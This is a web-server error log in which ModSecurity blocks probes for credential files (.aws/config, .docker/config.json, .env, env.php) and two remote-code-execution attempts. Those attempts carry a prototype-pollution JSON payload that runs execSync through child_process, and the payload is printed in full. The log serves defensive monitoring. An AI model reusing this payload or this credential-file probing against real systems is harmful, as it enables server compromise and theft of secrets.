[Fri Jan 09 16:49:29.448819 2026] [:error] [pid 1295009] [client 18.130.245.147:44286] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aWEjiROQmYLXvoRWxa_UswAAAAc"]
[Fri Jan 09 16:49:30.038104 2026] [authz_core:error] [pid 1291018] [client 18.130.245.147:44418] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Fri Jan 09 16:49:30.133997 2026] [authz_core:error] [pid 1290987] [client 18.130.245.147:44448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Fri Jan 09 16:49:30.231520 2026] [authz_core:error] [pid 1293937] [client 18.130.245.147:44474] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Fri Jan 09 16:49:30.332479 2026] [:error] [pid 1295009] [client 18.130.245.147:44500] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aWEjihOQmYLXvoRWxa_UtAAAAAc"]
[Fri Jan 09 16:49:30.332800 2026] [:error] [pid 1295009] [client 18.130.245.147:44500] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aWEjihOQmYLXvoRWxa_UtAAAAAc"]
[Fri Jan 09 16:49:30.332954 2026] [:error] [pid 1295009] [client 18.130.245.147:44500] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/logs/application.log"] [unique_id "aWEjihOQmYLXvoRWxa_UtAAAAAc"]
[Fri Jan 09 16:49:30.433344 2026] [authz_core:error] [pid 1295010] [client 18.130.245.147:44518] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Fri Jan 09 16:49:30.535214 2026] [authz_core:error] [pid 1290985] [client 18.130.245.147:44534] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Fri Jan 09 16:49:31.430124 2026] [:error] [pid 1290985] [client 18.130.245.147:44720] [client 18.130.245.147] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aWEjiwhnMz7Kl76N6_LzhwAAAAA"]
[Fri Jan 09 16:49:31.430320 2026] [:error] [pid 1290985] [client 18.130.245.147:44720] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aWEjiwhnMz7Kl76N6_LzhwAAAAA"]
[Fri Jan 09 16:49:31.430508 2026] [:error] [pid 1290985] [client 18.130.245.147:44720] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aWEjiwhnMz7Kl76N6_LzhwAAAAA"]
[Fri Jan 09 16:49:31.922045 2026] [:error] [pid 1290987] [client 18.130.245.147:44804] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aWEji5a6YpMWICkHe7jGYAAAAAI"]
[Fri Jan 09 16:49:31.922415 2026] [:error] [pid 1290987] [client 18.130.245.147:44804] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aWEji5a6YpMWICkHe7jGYAAAAAI"]
[Fri Jan 09 16:49:31.922591 2026] [:error] [pid 1290987] [client 18.130.245.147:44804] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aWEji5a6YpMWICkHe7jGYAAAAAI"]
[Fri Jan 09 16:49:32.014439 2026] [:error] [pid 1293937] [client 18.130.245.147:44826] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aWEjjC30tpu2Qs_7o9csFQAAAAY"]
[Fri Jan 09 16:49:32.014760 2026] [:error] [pid 1293937] [client 18.130.245.147:44826] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aWEjjC30tpu2Qs_7o9csFQAAAAY"]
[Fri Jan 09 16:49:32.014932 2026] [:error] [pid 1293937] [client 18.130.245.147:44826] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Thumbs.db"] [unique_id "aWEjjC30tpu2Qs_7o9csFQAAAAY"]
[Fri Jan 09 16:49:32.488509 2026] [:error] [pid 1290989] [client 18.130.245.147:44924] [client 18.130.245.147] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aWEjjLwxb_CFGAx2PBFTEAAAAAQ"]
[Fri Jan 09 16:49:32.488721 2026] [:error] [pid 1290989] [client 18.130.245.147:44924] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aWEjjLwxb_CFGAx2PBFTEAAAAAQ"]
[Fri Jan 09 16:49:32.488886 2026] [:error] [pid 1290989] [client 18.130.245.147:44924] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aWEjjLwxb_CFGAx2PBFTEAAAAAQ"]
[Fri Jan 09 16:49:33.593954 2026] [:error] [pid 1291018] [client 18.130.245.147:45088] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aWEjjfa-381C0T8V_x3abgAAAAU"]
[Fri Jan 09 16:49:33.594167 2026] [:error] [pid 1291018] [client 18.130.245.147:45088] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aWEjjfa-381C0T8V_x3abgAAAAU"]
[Fri Jan 09 16:49:33.594318 2026] [:error] [pid 1291018] [client 18.130.245.147:45088] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aWEjjfa-381C0T8V_x3abgAAAAU"]
[Fri Jan 09 19:54:12.500141 2026] [:error] [pid 1290985] [client 85.11.167.4:40418] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767984852_3313',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1AhnMz7Kl76N6_LzlQAAAAA"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.500270 2026] [:error] [pid 1290985] [client 85.11.167.4:40418] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767984852_3313',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1AhnMz7Kl76N6_LzlQAAAAA"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.500345 2026] [:error] [pid 1290985] [client 85.11.167.4:40418] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1767984852_3313 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1AhnMz7Kl76N6_LzlQAAAAA"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.501373 2026] [:error] [pid 1290985] [client 85.11.167.4:40418] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1AhnMz7Kl76N6_LzlQAAAAA"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.501513 2026] [:error] [pid 1290985] [client 85.11.167.4:40418] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1AhnMz7Kl76N6_LzlQAAAAA"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.635733 2026] [:error] [pid 1295010] [client 85.11.167.4:40422] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767984852',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1CTjpONdb2ogUxonxgAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.635856 2026] [:error] [pid 1295010] [client 85.11.167.4:40422] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767984852',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1CTjpONdb2ogUxonxgAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.635927 2026] [:error] [pid 1295010] [client 85.11.167.4:40422] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1767984852 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1CTjpONdb2ogUxonxgAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.636967 2026] [:error] [pid 1295010] [client 85.11.167.4:40422] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1CTjpONdb2ogUxonxgAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 09 19:54:12.637113 2026] [:error] [pid 1295010] [client 85.11.167.4:40422] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWFO1CTjpONdb2ogUxonxgAAAAg"], referer: https://economiasolidale.38121.it
